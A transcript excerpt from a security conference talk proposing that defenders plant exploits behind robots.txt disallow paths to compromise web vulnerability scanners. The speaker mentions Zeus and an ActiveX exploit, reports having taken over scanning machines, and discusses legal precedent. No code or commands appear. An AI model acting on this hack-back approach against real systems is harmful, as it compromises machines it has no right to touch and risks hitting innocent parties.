Now, really, so what's happening here? Like we heard about the Zeus botnet being leaked and the source code for that. So these black hats have these great tools to attack the web browser. Well, what about using these tools to defend ourselves? What about having Zeus installed on your production server with a disallow saying, hey, disallow,
36:01
don't go to slash Zeus. Because if you do, you're gonna get owned. Well, a web vulnerability scanner's gonna ignore that. It's gonna see a disallow and it's gonna go there purposefully. And in that case, it would be owned. Interesting side note, I've tried a number of vulnerabilities. Like I tried the ANI animated cursor vulnerability
36:21
to pop the scanner and that was the first thing I tried. It didn't work. So one thing to note is that a lot of these scanners, it's not executing the graphical part of it. So maybe some of the image-based attacks like we're seeing some of the new SVG-based attacks or OpenGL attacks on web browsers.
36:41
These are graphics-based and if you're running a browser headless within a scanner, it's not gonna be executing this complexity and that's not really a part of attack. So maybe it has a smaller attack surface than your average web browser, but it's still huge. Like in this attack right here, we're using an ActiveX exploit. And come on, ActiveX has been a festering wound
37:01
in Internet Explorer since the beginning. And it is a valid avenue of attack against some of these web browsers that rely upon IE. Yeah, so there you go. We took over some of these boxes as they were attempting to scan us. Can you switch me back?
37:22
So you definitely don't wanna put this in a place that's going to be like blatantly obvious, publicly accessible, because that creates obviously legal problems. And kinda as we talked about the system before, I think I'm four. We talked about the system before. There's some legal ramifications to this
37:41
and I don't necessarily wanna undercut that, right? There's some case evidence that says this might actually be a valid approach under particular circumstances. In particular, US versus Heckenkamp, which the network administrator took over the box of a person who was in their mail server saying that this was an emergency, I had to respond against this, this was the best course of avenue.
38:01
They used the information to get attribution to identify that this was the gentleman who had broken into the machine. And that evidence was applicable in court and the court accepted it and he went to jail. Because he signed a EULA that said, I'm not gonna do that. And within the course of action, the network administrator is tasked with protecting his systems in the best way that he possibly can and the best way
38:21
he could possibly do it, in this case, was to take it over. That doesn't mean you get free rights to sit around and leave vulnerable browser stuff inside of it so you can hit anybody, because accidental attacks probably would be bad too. But if you put something like this into a web server that's hosted on your mail server or on a print server or something that people really ought not to be in
38:41
that's not public, that maybe is an internal process, now you have a better case where you might be able to come against that. But again, consult your lawyer, right? So kind of as a recap, you need to stop acting like security is a broken egg that you can put Band-Aids over and think of it. You can't think of it this way. This is not a tenable position, right?
39:01
You need to start thinking like, I'm gonna kick your ass, right? Like, you need to think like this guy, because I'm not a rooster, but I'm actually a little afraid of him too. This isn't somebody you wanna mess with. This is somebody who looks like, if you start playing games with me, I'm gonna take you down. And that's how we should be treating security as we're looking towards it and stop thinking about purely in terms of vulnerabilities
39:21
and think, how can we shut you down? How can we take that back and how can we regain our pride, right? And that means we should fight back, right? That's what we need to do. So that's it for us. Any questions?